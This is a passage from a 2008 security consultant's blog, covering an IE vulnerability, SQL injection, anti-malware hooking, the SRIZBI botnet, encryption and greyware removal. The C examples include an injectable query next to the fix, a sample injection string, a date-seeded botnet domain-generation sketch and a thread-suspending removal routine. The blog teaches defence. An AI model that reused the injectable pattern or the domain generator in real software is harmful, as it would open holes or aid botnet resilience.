Tuesday 16 December 2008

Microsoft Security Advisory 961051

There is a lot of chatter around at the moment about a security vulnerability in all versions of Internet Explorer. What seems to have happened is:

1. Someone found a remote code execution vulnerability exploitable from IE.

2. Someone packaged malware to install via this vulnerability. At the moment, the reports say that it is stealing game passwords but hey, if the bad guy can run arbitrary code then it could do more than that. The malware is not being recognised by many scanners at the moment and it could change at any time. It seems to have an all numeric name and to load into svchost.

3. Someone hacked a bunch of websites to include malicious content. In most or all cases, this was done using a SQL injection attack. It continues to amaze me that there are still sites vulnerable to this class of attack as a trivial code review can find that type of flaw.
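
To show how little a code review has to look for, here is a minimal sketch in C using SQLite. It is purely illustrative – the hacked sites were almost certainly not written in C, and the table and column names are invented – but the flaw and the fix have the same shape in any language: pasting user input into SQL text versus binding it as a parameter.

#include <stdio.h>
#include <string.h>
#include <sqlite3.h>

/* Vulnerable: the attacker-controlled string is pasted straight into the SQL.
   Passing  x' OR '1'='1  as the name changes the meaning of the query. */
int count_user_vulnerable(sqlite3 *db, const char *name)
{
    char sql[512];
    snprintf(sql, sizeof(sql),
             "SELECT COUNT(*) FROM users WHERE name = '%s';", name);
    return sqlite3_exec(db, sql, NULL, NULL, NULL);   /* injectable */
}

/* Safer: the SQL text is fixed and the value travels as a bound parameter,
   so it can never be reinterpreted as SQL. */
int count_user_parameterised(sqlite3 *db, const char *name)
{
    sqlite3_stmt *stmt = NULL;
    int rc = sqlite3_prepare_v2(db,
             "SELECT COUNT(*) FROM users WHERE name = ?;", -1, &stmt, NULL);
    if (rc != SQLITE_OK) return rc;
    sqlite3_bind_text(stmt, 1, name, -1, SQLITE_TRANSIENT);
    while (sqlite3_step(stmt) == SQLITE_ROW)
        printf("matches: %d\n", sqlite3_column_int(stmt, 0));
    return sqlite3_finalize(stmt);
}

The two functions are shown without a main purely to contrast the patterns; the first is the sort of thing a reviewer can spot in seconds.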

So, the situation as I write is that all versions of IE are vulnerable to this form of attack, but you probably could not get infected via an HTML email: scripting is disabled there by default and, on Windows Server 2003, Server 2008 and Vista, the rights granted to HTML displayed in the mail client or the browser are so reduced that the malware shouldn’t be able to hook itself in.

Now, Microsoft are calling it an IE vulnerability but the mitigation advice includes unregistering oledb32.dll, which suggests that it isn’t really IE that is at fault – IE is just passing along information from a script and the underlying OS component has an issue. Now, if that is the case then I would be willing to bet that this is exploitable from Office as well, but there are no current reports of that. The advisory also says that the issue is with data binding. Since OLEDB is a COM DLL and there is no direct way of calling into a DLL from JScript anyway, the exploit is going to look like a couple of data binds sharing an object of some sort. There won’t be an external database, just some XML embedded in the HTML.

One of the mitigations that Microsoft are offering is to turn on DEP which means that this has to be an old school exploit involving a stack overrun so you shouldn’t expect to see a separate payload on the heap. The installation code should be right there in the XML.

So far, there is no clear pattern as to what sort of sites are hosting this. A Chinese motherboard manufacturer, some porn sites, a Taiwanese search engine and a couple of sites in Hong Kong, most of which are in Chinese. Spotting a pattern? The hackers can speak Mandarin. What is being stolen? World of Warcraft passwords among others. I would suspect that a gold farming operation has decided to expand.

Much is being made in the press about how open Microsoft have been about this vulnerability and some people have drawn the conclusion that this is an especially bad vulnerability. Hmmm, does that stand up to examination? Remote code execution vulnerabilities are fairly common in all browsers. MS08-052 patched an important one in GDI+, a much patched component. MS07-055 was another, that time in the vector markup parser – and again, it needed repatching later that year because the same errors were found in other code in the same module. MS07-045? Some were patched there too. MS07-058 also resolved remote code execution vulnerabilities accessible via Internet Explorer. On a technical level, the only unusual thing is that this particular vulnerability doesn’t need a separate payload on the heap. This one is only unusually bad because there are exploits on the web for it.

Signing off

Mark Long, Digital Looking Glass Ltd

Saturday 13 December 2008

Performing to expectations

There are good and bad points about running a small consultancy. I would like to focus on one of the good things though. If I can steal a quote from an old American Theatre manager, “Every day, the same thing. Variety!”

So, last week was largely spent coding in good old VB6. This past week has been partially spent writing a guide on securing home PCs to protect children and bank details. However, I also did some work on how to troubleshoot performance issues for some people that didn’t want to hire outside talent for the work but needed the skills. That is OK with me. I always enjoy mentoring and teaching. I thought that it would be good to share the basics with a wider audience so I will blog about it here.

There are a couple of odd things about performance tuning. The first is that the law of diminishing returns tends to cut in long before you reach the theoretical limit. There comes a time when the cost vs benefit equation comes out against further change. The second is that it frustrates managers for reasons that will quickly become apparent.

So, the first step is to find the bottleneck. Are we memory bound or CPU bound or I/O bound – and with virtual memory, memory bound can add to I/O bound.

Memory bound applications are not quite what they used to be. When I was a kid, I had an Acorn Atom. In fact, I had the world’s fastest Acorn Atom since I had replaced the 1MHz 6502 with a 2MHz 6502A which I ran at 4MHz using a bolt on heat sink (rare for processors in those days) and a 5V line running at 7.2 volts. That puppy used 2114L RAM chips, each of which stored 1K bits. Put 8 of them on a bus and you have 8K bytes of memory. Each of those cost £24 at the time. I see that they are now available from specialist dealers for £1.40, but we are talking about 1980 money, so we are talking £83 for 1K bits or £664 (about $992) for 8K of memory.

These days, you can get 1GB for less than £17, so the problem is normally not that there is not enough memory to back the address space but that there is considerable contention for the memory. A prime candidate for this sort of problem is a server used for multiple purposes. Small Business Server has to be a domain controller and an IIS box and an Exchange server and a SQL Server host. That is a lot for one box. Adding a memory hungry application is not going to help matters at all and most people don’t try. However, you often see IIS and SQL Server on the same box and both are big users of memory. While Server 2008 has made some improvements in this area and 64 bit servers are more common, there are still a lot of applications that hit problems. The key is looking at the page faults per second. The number will vary depending on the application but if it looks too high then you probably need to tune the memory use and give yourself some head room, if such a thing is possible within the address space restrictions. The ASKPERF blog discusses this in much more detail. Oh, and overworked .NET apps tend to use a LOT of memory because the garbage collector gets starved. Always look at workload first with them.

CPU bound processes are perhaps more interesting. As always, Perfmon is your friend and you can get a lot of information from looking at thread activity and the percentage of time spent in kernel mode. However, please be aware of something very important. These figures will be best estimates. They can’t be taken as gospel. Apps that thrash the CPU fall into two camps: those that really are that CPU intensive and those that are doing unnecessary work. Calculating Pi to a million places is CPU intensive. Cracking codes is CPU intensive. If you are serving web pages or doing database updates or something which isn’t number crunching, then it shouldn’t be that CPU intensive. You need to discover where the CPU is being wasted. Heap management is a classic. If you fragment the heap badly by using sloppy memory allocation and deallocation, well, the heap manager will spend a lot of time cleaning up. Consider object brokers as they are often the answer – there is a sketch of the idea below. Do you have too many threads? For CPU intensive tasks, you should have fewer threads than for I/O bound tasks. If we are talking about a database server that waits for the DB to return records which are then processed, then 50 threads per CPU might well be perfectly healthy. If you are crunching through large arrays then 5 threads per CPU might be too many. Please remember that thread switching is not free. Oh, and if your process is spending too much time in kernel mode then you might want to consider what drivers you have and what you are asking the system to do. Finally, you might have to hand tune code to make it more efficient. I discussed this back in 2005.
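
The object broker idea is easiest to see in code. Here is a minimal sketch of a fixed size free list in C: instead of hammering malloc and free for every short lived buffer (and fragmenting the heap), retired objects go back on a list and are handed out again. The names and sizes are invented for the example, and a real implementation would need locking if several threads shared the pool.

#include <stdlib.h>

#define OBJ_SIZE   256        /* size of the pooled object, example value            */
#define POOL_MAX   1024       /* how many spare objects we are willing to keep       */

static void *g_free_list[POOL_MAX];
static int   g_free_count = 0;

/* Hand out a recycled object if we have one, otherwise fall back to malloc. */
void *pool_get(void)
{
    if (g_free_count > 0)
        return g_free_list[--g_free_count];
    return malloc(OBJ_SIZE);
}

/* Put the object back for reuse; only free it if the pool is already full. */
void pool_put(void *obj)
{
    if (g_free_count < POOL_MAX)
        g_free_list[g_free_count++] = obj;
    else
        free(obj);
}

The win is not just the saved malloc calls; it is that the heap stops being churned into thousands of tiny free blocks that the heap manager then has to coalesce.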

I/O bound processes spend most of their lives waiting. Typically, CPU utilisation will be low. There are really two approaches here. The first is to speed up the I/O operation. Disk transfer rates vary from 45MB/s to 3GB/s and seek times vary from 2ms up to 15ms per seek. Faster hardware can make a big difference, especially if the hard drive has a decent cache buffer or if you can cache in software. Faster network links can help too. The other approach is to minimise I/O by careful caching of data. A small read only table may as well be held in memory. There is no need to pull back more fields from a database than you will use. You could even look at offloading reading and writing to another process in some cases. Typically, you need to consider more than one of these options.
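
To make the caching point concrete, here is a toy sketch in C: a small read only lookup table is loaded once and every later read is a memory access rather than an I/O operation. The table, its contents and the loader are all invented stand-ins for whatever file or database read you would really be doing.

#include <stddef.h>
#include <string.h>

#define MAX_RATES 64

struct rate { char code[4]; double value; };

static struct rate g_rates[MAX_RATES];   /* the whole table lives in memory */
static size_t      g_rate_count = 0;
static int         g_loaded = 0;

/* Stand-in for the real I/O - imagine a SELECT against a tiny reference table. */
static size_t load_rates_from_store(struct rate *out, size_t max)
{
    if (max < 2) return 0;
    strcpy(out[0].code, "GBP"); out[0].value = 1.0;    /* invented sample rows */
    strcpy(out[1].code, "USD"); out[1].value = 1.5;
    return 2;
}

double lookup_rate(const char *code)
{
    if (!g_loaded) {                      /* pay the I/O cost once, not per call */
        g_rate_count = load_rates_from_store(g_rates, MAX_RATES);
        g_loaded = 1;
    }
    for (size_t i = 0; i < g_rate_count; i++)
        if (strcmp(g_rates[i].code, code) == 0)
            return g_rates[i].value;
    return 0.0;                           /* not found */
}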

So, why does this frustrate managers? Well, because there is no clearly defined end to this process, there is no specific end date by which you will have results. Try putting that on a Gantt chart! The other reason is that progress is very non-linear. You find a bottleneck and fix it. You immediately hit a second bottleneck. You fix it. If you have chosen well, initial progress is rapid. Because of the law of diminishing returns, you will make less dramatic improvements over time. The manager gets to see less and less success over each iteration. To many people, that seems like you are getting worse at what you do so that is one to message carefully.

I hope that this helps someone

Signing off,

Mark Long, Digital Looking Glass Ltd

Wednesday 10 December 2008

Are two better than one? Not always, IMHO

Although selling advice is what I now do for a living, I try to help out on the newsgroups as much as I can. I am a firm believer that you have to give something back as well as taking. I am no doctor or spiritual leader. I am a technical type. I give technical information.

One question that I answered on a newsgroup involved a very routine malware infection and there was a free anti-malware product that would remove it with a reasonable level of certainty. I recommended uninstalling the previously installed anti-malware solution first. Some people contacted me to say that they didn’t agree with that advice. Well, that is fine. Disagreement can be good. However, I disagreed with their reasoning. They argued that 2 anti-malware products would offer better protection. At most, they suggested, the existing one should be turned off during the scan.

The reason that I recommended uninstalling as opposed to “turning off” the existing checker was that anti-malware programs typically work by inserting redirects into a thing called the KiServiceTable, which sits at the interface between user mode and the kernel, or by subverting the starts of the kernel functions that the KiServiceTable points to. They do this so that they can monitor system activity by monitoring the requests made. This is a good technique but there is no safe way to reverse it, since there is no built in synchronisation that allows you to pause all kernel operations while you effectively rewrite the kernel. Accordingly, turning off a malware checker doesn’t always unhook it from the system. It just causes it to ignore whatever it sees. So, disabling an AV product is not the same as removing it.

Now, anti-malware products work by subverting the system, by getting inside the internal functionality of it and modifying its behaviour. Ok, this is good and proper and done for the good of the user, more or less with his or her consent. However, malware does the same thing for malicious reasons without the user’s informed consent. Here we have a competition. Everyone wants to be the first to subvert the system – as the saying goes, he who hooks lowest wins. When you are at the same level, the first is effectively the lowest level hook because it can control what happens after that point. If an anti-malware program finds that there are already hooks in place that subvert the system, what will it do? Well, it might set up a chain where one checker is called after the other, in which case things work but it is a bit slow. That can happen accidentally if they use different hooking strategies. Alternatively, the second program to run might override some of the redirection and consider the other anti-malware product as possibly hostile. You could and sometimes do end up with some system calls monitored by one program and others monitored by a second program.
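
The chaining idea is easier to see in a toy model than in a kernel dump. Here is a minimal user mode sketch in C, nothing to do with any real product’s internals: the “system call table” is a single function pointer, checker A hooks politely by remembering whoever was there before and chaining to them, and checker B hooks rudely by pointing straight at the real function, at which point A silently stops seeing anything.

#include <stdio.h>

typedef int (*open_fn)(const char *path);

static int real_open(const char *path)
{
    printf("really opening %s\n", path);
    return 0;
}

/* The "system call table" in this toy is one function pointer. */
static open_fn g_open = real_open;

/* Checker A chains: it saves the previous hook and calls it on the way through. */
static open_fn a_previous;
static int a_hook(const char *path)
{
    printf("checker A saw %s\n", path);
    return a_previous(path);
}

/* Checker B overrides: it jumps straight to the real function,
   so checker A never sees another call. */
static int b_hook(const char *path)
{
    printf("checker B saw %s\n", path);
    return real_open(path);
}

int main(void)
{
    a_previous = g_open;  g_open = a_hook;   /* A installs first               */
    g_open = b_hook;                         /* B installs second, no chaining */
    return g_open("secret.txt");             /* only B and the real open run   */
}

Swap the install order, or make B chain as well, and you get a completely different outcome – which is really the whole point about mixing two products.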

So, what actually happens when you have 2 anti-malware programs trying to do the same job? No-one knows. It varies according to what decisions the programmers made and what order they start. Was that combination tested? It seems unlikely. If the products were tested together, were these versions tested together? Almost certainly not. It is normally considered “an unsupported scenario” which is code for “We don’t know what will happen or we expect it to break and don’t care”.

Are you much safer with two, assuming that they work? Not so much. Virus signatures are shared (through the Virus Information Alliance), so anti-malware checkers with up to date signatures typically detect pretty much the same subset of malware as each other and fail to detect pretty much the same subset. Accordingly, the gain from running two is marginal at best, even if they do play nicely together – and that is far from certain. Of course, if one of the programs were much weaker than average then the second could help, but why would you be running a lame antivirus in the first place?

I don’t know of any cut and dried research on this though. As it stands, it is just my professional opinion. So much of our work against malware is at the limits of knowledge because each week, there are new variants and new exploits. Several times each day, vendors release new signatures. The industry is running as hard as it can to keep up and frankly, it is losing. Infections are up 100%. Spam is up more than 90%. In such shifting sands, a best guess is often all that you have.

We live in interesting times and the road promises to get bumpier before it smooths out

Signing off,

Mark Long, Digital Looking Glass

Wednesday 3 December 2008

Bugs, threats and seasonal events.

As I write, I am still warming up after a very unsuccessful attempt to get to London by train. An hour and a half waiting on a station platform gives plenty of time for thought but my fingers were soon too numb to use my PDA.

In a break from tradition, I am going to name and shame someone responsible for a bug that I recently was involved in fixing. This was one of mine and was interesting because it was rather subtle. It was in some VB6 code that I wrote the other day and was of the form

' Enable the OK button only when both fields contain text (or so I thought)
If Len(txtSomething) And Len(txtSomethingElse) Then
   cmdOK.Enabled = True
Else
   cmdOK.Enabled = False
End If

So, the idea was that the button is only enabled if there is text in both fields. I am a big fan of not letting people make errors in the first place if possible. I had thought (correctly) that Len(whatever) would give 0 (false) or something else (true). The code worked most of the time. It took me a second or two to work out why. Compilers use a lot of state machines. In this case, the state that the parser was in when it got to this code was that it was expecting a Boolean, and what I had given it was a pair of integers. A single integer it would simply have coerced, treating the result of the Len function as a Boolean. Was there any way of making “integer And integer” into a Boolean? Why yes, there was. VB doesn’t make a distinction between a logical And and a bitwise And. They use the same keyword, unlike C which uses && and & respectively. Now, maybe this was a good decision and maybe it wasn’t, but it was one that I should have remembered. As written, the code was ambiguous and the parser went for the simpler option: a bitwise And of the two lengths. Lengths of 12 and 8 give 12 And 8 = 8, which is non-zero, so the control was enabled. Lengths of 8 and 4 give 8 And 4 = 0, so it was disabled even though both fields had text in them. A less ambiguous bit of coding would have been

cmdOK.Enabled = Len(txtSomething) * Len(txtSomethingElse)

but I couldn’t bring myself to write such unintuitive code and a multiplication for a boolean operation seems wasteful although it would have made no actual difference in this case. The best coding would have been

cmdOK.Enabled = (Len(txtSomething) > 0) And (Len(txtSomethingElse) > 0)

As for threats, it seems that SRIZBI is back on the air. The bot and the bot master had a trick up their sleeves that the security community had not expected. If the bot is unable to contact its command and control channel, it generates a URL mathematically and refers to it for instructions. The bot masters had the URL ready and most of the botnet was picked up again on schedule. I have to applaud our Russian friends for that. Fortunately, it is relatively simple to simulate the loss of a command and control system in the lab, so we can anticipate where they will go next time. I still think that a peer to peer system like Storm used is the way to go in the long term. Oh, and a big hello to my readers at the Washington Post. You heard it here first.
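
I have no inside knowledge of SRIZBI’s actual algorithm and this is emphatically not it, but the general trick is easy to sketch: seed a cheap generator with the date, cook up a handful of candidate names, and have the bot try each one until something answers. The constants and the .info suffix below are invented; the point is that the defenders can run the same code forward in the lab, which is exactly how the fallback URLs get predicted.

#include <stdio.h>
#include <time.h>

/* Derive a handful of candidate rendezvous domains from today's date. */
static void candidate_domain(int year, int month, int day, int n,
                             char *out, size_t outlen)
{
    unsigned int seed = (unsigned int)(year * 10000 + month * 100 + day) * 2654435761u
                        + (unsigned int)n * 40503u;
    size_t len = 8 + (seed % 5);               /* 8 to 12 letters */
    size_t i;
    for (i = 0; i < len && i + 6 < outlen; i++) {
        seed = seed * 1103515245u + 12345u;    /* cheap LCG step  */
        out[i] = 'a' + (seed >> 16) % 26;
    }
    snprintf(out + i, outlen - i, ".info");
}

int main(void)
{
    time_t now = time(NULL);
    struct tm *t = gmtime(&now);
    char name[64];
    for (int n = 0; n < 5; n++) {
        candidate_domain(t->tm_year + 1900, t->tm_mon + 1, t->tm_mday, n, name, sizeof(name));
        printf("try %s\n", name);              /* the bot would attempt a fetch here */
    }
    return 0;
}

The bot master only has to register one of the candidates ahead of time; everyone else has to register, block or monitor all of them.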

In other news, Apple are now recommending that Mac users install some kind of anti-virus product. Previously, their recommendation was that the threat was insufficient to warrant the potential downside of having an AV solution. The world is getting more dangerous, folks.

Oh, and there seems to be a lot of buzz about an enterprise information security package that contains rootkit-like technology in a Chinese-written module. Some of the AV vendors are detecting it as malicious. Well, it could be, but it is hard to know. Increasingly, we see security tools that resemble malware more closely as they try to hide from each other. The malware wants to disable the AV product and the AV product wants to disable the malware. It sounds like the new rootkit uses function redirection, so the old Rootkit Unhooker tool should detect it.

Well, back to coding. You have to love feature creep.

Signing off

Mark Long, Digital Looking Glass

Monday 1 December 2008

A trip down (not much) memory lane

As regular readers of this blog (and thanks to all of you for reading, by the way) will know, I debug code, review code and reverse engineer malware. Debugging and security for fun and profit. Well, I find it fun at any rate and it is my business, so I take what profit I can in these difficult days. However, I have spent the last few days coding until the small hours, which is something that I don’t generally do that often.
 
As always, no names and no pack drill. My customer had bought in a solution that was a perfectly good solution except that it was designed to be single user, with that one user having complete control over all aspects of the data. There is nothing wrong with that except that it needed to work with 70 users, of which 69 would have limited abilities to change the data. I was called in to see if I could make one thing into another.
 
It was clear from the start that the answer was “No, sorry, not happening”. However, that left my client in the lurch as they were hard up against a deadline. They needed a solution and they needed it in a hurry. It had to run on low end XP equipped laptops with older versions of Office and couldn’t require any installation. Oh, and I got the specification (on the back of an envelope) on Friday night and it needed to be running for training on Monday and in production for Tuesday. Clearly, that was going to be a challenge – and it had to match the look and feel of the previous solution.
 
Tricky, eh? .NET was out because the systems didn’t have the required runtime and installation was a problem. Pure C++? That would do the job but a fully functional system in less than 72 hours? Maybe there were people who could have pulled that off but not me. Java? JVM not installed. This wasn’t looking good. So, it would have to be something where all the required files were part of the OS.  Hmmm… MSVBVM60.DLL ships with the OS. ADO ships with the OS. I could write it in VB6, an old, old friend of mine. I wouldn’t have any OCX controls to use but I could write controls in the project if needed.  It is a RAD environment and that would help a lot. Yes, I could get the customer out of a bind here.
 
Ok, I haven’t had a lot of sleep over the weekend but I wouldn’t be writing this if there was still a problem. Yes, it is an old technology. It has its limitations. It got the job done nicely though. I was a bit concerned that I would see repeated reloads across the network from the application EXE (it was a single file run from a share) because the memory would be considered discardable. However, I stopped worrying when I built for release. The executable was 60K long. No, that isn’t a typo. It was less than 64K on disk and even with the recordsets and ADO it was still less than 5MB in memory. Four polymorphic forms that pretend to be several more with some control hiding, some validation code, a lot of custom UI code and some fairly unremarkable ADO code – and it had a tiny footprint. The customer wanted their logo added (another 6K) and an attractive high resolution icon (64K), bringing the total to just under 128K. I can live with that level of bloat.
 
There are a lot of cool things about the new languages and for serious development, you have to be impressed. That is not to say that old school doesn’t sometimes get the job done just fine.
 
Signing off
 
Mark Long,  Digital Looking Glass Ltd
 
 

Friday 21 November 2008

Encryption - How much is enough, how much is too much?

You might expect me to say that everything should be encrypted to the hilt. Well, that would be overkill. No, the trick is finding the right level of encryption.

I have been asked in the past what would happen if someone came up with an unbreakable code. Would that be game over for cryptanalysis? Well, I confess that I am not a specialist in crypto but I feel pretty secure in answering this one. No, it would not be game over because there are already unbreakable codes. One time pad codes are unbreakable without the pad because all possible messages are equally likely – the same cypher text (encrypted version) could decrypt to “Move $1 million to account 43445342” or “I want to buy a painting of a goat” and there is no way to tell which from the cypher text. The way to attack those would be to try to recover the pad – the sequence of nonsense that was used to code the plain text into cypher. That could be a very private thing such as a sheet of rice paper held by only two people in the world and eaten before any third party got a chance to decrypt the code. It could be very public, such as letters from a book chosen at random – each day, you advance one page. One of my favourite pencil and paper cyphers is the Solitaire Cypher, where the order of a pack of cards is used to generate the keystream. It isn’t a true one time pad because the keystream is generated rather than truly random, but the only equipment required is a pencil, a bit of paper and some ordinary playing cards. Shuffle the deck and the key is lost forever.
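
For anyone who has not seen one, a one time pad is almost embarrassingly simple to implement; all of the difficulty is in generating, distributing and protecting the pad. A minimal sketch in C:

#include <stddef.h>

/* XOR the message with the pad. Encryption and decryption are the same
   operation. The security rests entirely on the pad being truly random,
   at least as long as the message, kept secret and never reused. */
void one_time_pad(const unsigned char *pad, const unsigned char *in,
                  unsigned char *out, size_t len)
{
    for (size_t i = 0; i < len; i++)
        out[i] = in[i] ^ pad[i];
}

Run it once with the pad to encrypt and once more with the same pad to get the plain text back; reuse the pad for a second message and the whole guarantee evaporates.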

However, I digress. Popular codes used today are things like 3DES (usually pronounced Triple DES) and AES with 128 bit or 256 bit keys. 3DES is very big in the financial world and replaced single DES. Essentially, 3DES does what DES does three times, processing its own output. Are they unbreakable? Not quite. DES is fairly easy to break with the right kit. 3DES would just take longer and require more kit. AES256 would theoretically take many millions or even several billion years to crack with a single desktop system – although the 1.105 petaflop/s IBM supercomputer at Los Alamos National Laboratory might manage it a darn sight quicker. Even with that, the process would, on average, take thousands of years. Does your data need to be safe for that long?

That turns out to be one of the important questions. Imagine you are choosing encryption for a password that will be sent across the wire – and let us ignore the use of hashes for the moment. A password is valid for 1 week and then must be changed. The user can change their own password for 1 week after the old password expires. After that, the help desk have to do it. If the encryption is good enough to stand up for more than 2 weeks, then it is good enough. Making it tougher adds nothing. However, the location of a vault is unlikely to change for hundreds of years. That needs to be secret for a lot longer.

Another important question is how sensitive the data actually is. What I bought on Amazon in the last year? You can see that if you want. A trivial encryption such as ROT13 will do the job here. My interactions with my bank and my lawyer? That is more sensitive. 3DES at least. The launch code for ICBMs? Even if they change fairly often, I think that we should use a good strength cypher on those!

However, there is something about encryption that people often don't consider. It does more than hide information from prying eyes. Imagine that I am running a client that is having a conversation with a server. The request is going over the wire, perhaps via SSL, perhaps via some other scheme. I make a request and the request is coded with a shared secret key that we exchanged at the start of the session – and which is only valid for this session. I get a reply and it is junk until it is decrypted using the shared secret. There is nothing odd about that at all. Millions of systems work that way. So, what would happen if someone tried to hijack the session and inject a new request? Unless they have the shared secret, their request will be decoded into meaningless goo. Since the request probably contains an encrypted copy of some sort of sequence number, it would probably fail at the first hurdle. Knowing the shared secret is a big part of proving that I am still the client that I was at the start of the conversation.

How about if an attacker tries to replay a recording of the conversation without understanding it? The shared secret is generated per session. They have the wrong one so the replay would fail very early. A well designed protocol can protect pretty effectively against session hijacks but there are always people out there looking for even the narrowest gaps to exploit.
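
The paragraphs above talk about getting that property implicitly from the encryption itself; the explicit version of the same idea is to stamp each request with a sequence number and a keyed hash under the session secret, so a hijacked or replayed request fails verification. A rough sketch using OpenSSL’s HMAC – the message layout and buffer sizes are invented for the example:

#include <stdio.h>
#include <string.h>
#include <openssl/evp.h>
#include <openssl/hmac.h>

/* Tag = HMAC-SHA256(session_key, sequence_number || payload).
   A hijacker without the session key cannot produce a valid tag, and a
   replayed message fails because the receiver has moved past that sequence. */
int tag_request(const unsigned char *key, size_t keylen,
                unsigned int seq, const unsigned char *payload, size_t plen,
                unsigned char tag[32])
{
    unsigned char buf[4 + 1024];
    unsigned int taglen = 0;
    if (plen > 1024) return -1;
    buf[0] = (unsigned char)(seq >> 24); buf[1] = (unsigned char)(seq >> 16);
    buf[2] = (unsigned char)(seq >> 8);  buf[3] = (unsigned char)seq;
    memcpy(buf + 4, payload, plen);
    return HMAC(EVP_sha256(), key, (int)keylen, buf, 4 + plen, tag, &taglen) ? 0 : -1;
}

/* The receiver recomputes the tag and compares without an early exit. */
int check_request(const unsigned char *key, size_t keylen,
                  unsigned int expected_seq, const unsigned char *payload, size_t plen,
                  const unsigned char tag[32])
{
    unsigned char mine[32];
    unsigned char diff = 0;
    if (tag_request(key, keylen, expected_seq, payload, plen, mine) != 0) return 0;
    for (int i = 0; i < 32; i++) diff |= (unsigned char)(mine[i] ^ tag[i]);
    return diff == 0;
}

A real protocol would of course combine this with the encryption rather than replace it, but it shows why “knowing the shared secret” is what keeps a session yours.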

What are the downsides to encryption? Well, there are several. It takes time. If you are reading from a disk encrypted with BitLocker, each byte read from disk will cost you around 30 additional CPU cycles – and blow your processor cache and pipeline. Ok, that is not the end of the world but it is a cost. How about data loss though? Bob has excellent data security. All of his files are stored on a machine protected by TrueCrypt, all of his mail goes via PGP and all of his ZIP files and documents have strong passwords. If Bob is a paragon of virtue then the risk is that he will be hit by a bus and that data will be lost. That could be very serious indeed. Of course, it might be that Bob is not a paragon of virtue in which case, how would anyone find out?

I recall that the police were not at all happy when BitLocker came out. Several of them at the F3 conference (First Forensic Forum) described it as a paedophile's best friend since it made offline forensics so hard to do. Encryption is a tool and like pretty much all tools, it is morally neutral. It protects good and bad people equally well. Some would argue that those who have nothing to hide need not keep secrets but I am not so sure. If I share my data with (for example) the government because it is not encrypted from them then I am relying on their ability to keep my data as safe as I have or better. Given their past performance on this, I think that I will encrypt it myself, thank you.

Signing off

Mark Long, Digital Looking Glass

Monday 17 November 2008

Ooh, ooh, ohh, ohh, Staying Alive!

Ah, who can forget the BeeGees? I try and try. No, there is a point to the title of this blog entry. If you work with computers (a fairly safe assumption if you read this blog) then you will doubtless be familiar with the casual “You know, my computer has been acting weird. Would you mind having a look at it?”. There is a song by Tom Smith called “Doing tech support for Dad” about it. Guess what I did at the weekend? Sometimes I am lucky and the person has some interesting malware. In this case, it was interesting greyware.
 
Now, is greyware a class of malware? Back at Microsoft, the lawyer approved phrase was “potentially unwanted software” because it was often software which had been installed after the user agreed to some EULA that said on page seven that it might just send details of your web usage to a server somewhere and might show you ads for products of dubious authenticity. The lawyer’s position is that you can’t call it malware if the user agreed to install it.
 
So, what did we have here? A typical family system running XP Home edition, not too much memory and an older specification with all members of the family being admins on the system. Under the circumstances, the machine was remarkably clean. It was running a free AV product that had picked up that one of the DLLs loaded into every process was dodgy but every time it tried to fix it, it failed.

I spent a good few hours looking at this particular greyware (and for legal reasons, no names will be given here) and it was a resilient little devil. I would like to talk about some of the tactics that it used. However, before I do that, I would like to talk about coding styles in malware.
 
There are some fairly distinct styles in malware writing. The Script Kiddie and those just up from there typically lash components from different sources together into a crude botch and you can’t tell much about the kiddie. Eastern European black hats are quite workman-like and the code quality is generally pretty good. They have clearly had formal training. They often borrow ideas off other malware writers, possibly those working for the same stable, but I suspect that they pinch ideas off rival gangs just as often. They keep up with modern trends or set them. They generally write stealthy code with some excellent use of rootkits. Conversely, they do relatively little to hide their infrastructure and looking at the network activity generally takes you to Russia or the Ukraine in fairly short order. That could well represent a difference between the developers and the money men who coordinate gang activities. I am told that military malware from Eastern Europe follows the same patterns but it is better engineered and doesn’t lead as directly back to Eastern Europe. I have only seen a fairly limited range of military malware from the Middle East but the quality was excellent and the stealth features were even better than the Eastern European code. They clearly worked in teams with subject matter experts writing different bits of the code. A lot of money had been spent on those projects. Chinese malware uses a very different approach. It rarely has much stealth capacity. Instead, it overwhelms by sheer weight of numbers. If two variants of the code are good, then ten are better. If one protection mechanism is good, then five are better. I am told by friends who move in places where true names are rarely given and all the players work for organisations known only by 3 letter acronyms that Chinese espionage works in very much the same way. Ten agents watching are better than two.
 
Anyway, I digress. This greyware proved to be Chinese and I had guessed as much from the approach. The directory where it lived was visible, which made life easy… well, actually, not so much. Any attempt to delete a file from the directory failed with a sharing violation if it was a code component – oh, I may just call any such files “PE files”, which stands for Portable Executable. This covers any sort of file that can be loaded and run as native code. So, something was locking the files. A quick search showed a process that was loaded from the directory that the other known files were from, so I tried to kill it with Task Manager but it wouldn’t die. Ok, time for the toolbox to come out. Although Sysinternals is wholly owned by Microsoft, the tools are still free and wonderful. I downloaded them and Process Explorer killed the process just fine. It was offline for less than 5 seconds before it popped up again. A check of the parent process showed it to be an instance of SVCHOST. Right, it was time to look at the services.
 
There were a couple of services that seemed to be stopped… how could a stopped service be doing this? I downloaded WinDbg and had a look at the service host for that service and clearly it was not stopped. I am going to look into this technique some more when I have time but it is clear that the SCM was sending service control messages which the service claimed to be processing but the status codes that it returned were out and out lies. However, that was not a problem. I could force terminate the containing service. It popped back up again, spawned by another instance of SVCHOST. Ah, ok, I had seen that trick before. Two processes each have a thread that waits on the death of its brother process. If you kill one then the thread unblocks, restarts its brother process and blocks again. The brother does the same. I knew how to deal with that thanks to Mark Russinovich, a very clever and helpful chap who it was my pleasure to meet once or twice. You can suspend all the threads in a process and that doesn’t trigger the brother process – after all, the monitored process is only sleeping, not dead. You suspend the other process and you have two frozen malicious processes. I went into the registry and killed the startup for those services and rebooted.
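
For anyone who wants to see the plumbing behind the freeze trick, the user mode version is not complicated – Process Explorer will do it for you, but a rough Win32 sketch in C, error handling mostly omitted, looks like this: snapshot the system’s threads, suspend every thread that belongs to the target process, then do the same to its partner before touching anything else.

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>

/* Suspend every thread in the given process so it cannot resurrect its partner. */
int freeze_process(DWORD pid)
{
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    THREADENTRY32 te;
    int frozen = 0;
    if (snap == INVALID_HANDLE_VALUE) return 0;
    te.dwSize = sizeof(te);
    if (Thread32First(snap, &te)) {
        do {
            if (te.th32OwnerProcessID == pid) {
                HANDLE h = OpenThread(THREAD_SUSPEND_RESUME, FALSE, te.th32ThreadID);
                if (h) {
                    if (SuspendThread(h) != (DWORD)-1) frozen++;
                    CloseHandle(h);
                }
            }
        } while (Thread32Next(snap, &te));
    }
    CloseHandle(snap);
    return frozen;
}

int main(int argc, char *argv[])
{
    if (argc < 2) { printf("usage: freeze <pid>\n"); return 1; }
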